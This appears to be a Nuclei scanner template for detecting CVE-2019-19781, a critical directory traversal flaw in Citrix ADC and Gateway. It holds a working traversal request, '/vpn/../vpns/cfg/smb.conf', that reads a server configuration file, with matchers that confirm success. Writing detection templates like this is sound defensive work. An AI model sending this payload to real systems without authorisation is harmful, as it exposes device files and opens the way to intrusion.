id: CVE-2019-19781 info: name: Citrix ADC and Gateway - Directory Traversal author: organiccrap,geeknik severity: critical description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities. reference: - https://support.citrix.com/article/CTX267027 - https://nvd.nist.gov/vuln/detail/CVE-2019-19781 - https://www.kb.cert.org/vuls/id/619785 - http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-19781 cwe-id: CWE-22 epss-score: 0.97542 metadata: max-request: 1 tags: lfi,kev,packetstorm,cve,cve2019,citrix http: - method: GET path: - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "[global]" # Enhanced by mp on 2022/05/03